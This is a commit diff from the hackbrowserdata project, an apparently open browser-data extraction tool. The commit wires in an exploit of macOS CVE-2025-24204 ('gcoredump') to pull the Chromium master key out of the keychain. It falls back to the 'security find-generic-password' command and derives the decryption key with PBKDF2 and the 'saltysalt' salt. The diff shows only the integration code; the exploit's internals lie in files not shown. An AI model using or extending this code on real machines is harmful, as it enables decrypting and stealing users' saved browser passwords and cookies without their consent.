feat: Decrypt the browser master key on macOS via CVE-2025-24204 (#494)

* feat: Decrypt the browser master key on macOS via CVE-2025-24204

* fix: resolve lint warnings and stabilize tests

* feat: default to gcoredump key extraction on macOS
This commit is contained in:
zznQ
2025-11-27 17:13:07 +08:00
committed by GitHub
parent 1a04abb81a
commit f2b0e4bf47
5 changed files with 971 additions and 1 deletions
+19 -1
View File
@@ -11,6 +11,7 @@ import (
"os/exec"
"strings"
"github.com/moond4rk/hackbrowserdata/browser/exploit/gcoredump"
"github.com/moond4rk/hackbrowserdata/crypto"
"github.com/moond4rk/hackbrowserdata/log"
"github.com/moond4rk/hackbrowserdata/types"
@@ -24,6 +25,18 @@ var (
func (c *Chromium) GetMasterKey() ([]byte, error) {
// don't need chromium key file for macOS
defer os.Remove(types.ChromiumKey.TempFilename())
// Try get the master key via gcoredump(CVE-2025-24204)
secret, err := gcoredump.DecryptKeychain(c.storage)
if err == nil && secret != "" {
log.Debugf("get master key via gcoredump(CVE-2025-24204) success, browser %s", c.name)
if key, err := c.parseSecret([]byte(secret)); err == nil {
return key, nil
}
} else {
log.Warnf("get master key via gcoredump(CVE-2025-24204) failed: %v, skipping...", err)
}
// Get the master key from the keychain
// $ security find-generic-password -wa 'Chrome'
var (
@@ -43,10 +56,15 @@ func (c *Chromium) GetMasterKey() ([]byte, error) {
return nil, errors.New(stderr.String())
}
secret := bytes.TrimSpace(stdout.Bytes())
return c.parseSecret(stdout.Bytes())
}
func (c *Chromium) parseSecret(secret []byte) ([]byte, error) {
secret = bytes.TrimSpace(secret)
if len(secret) == 0 {
return nil, errWrongSecurityCommand
}
salt := []byte("saltysalt")
// @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157
key := crypto.PBKDF2Key(secret, salt, 1003, 16, sha1.New)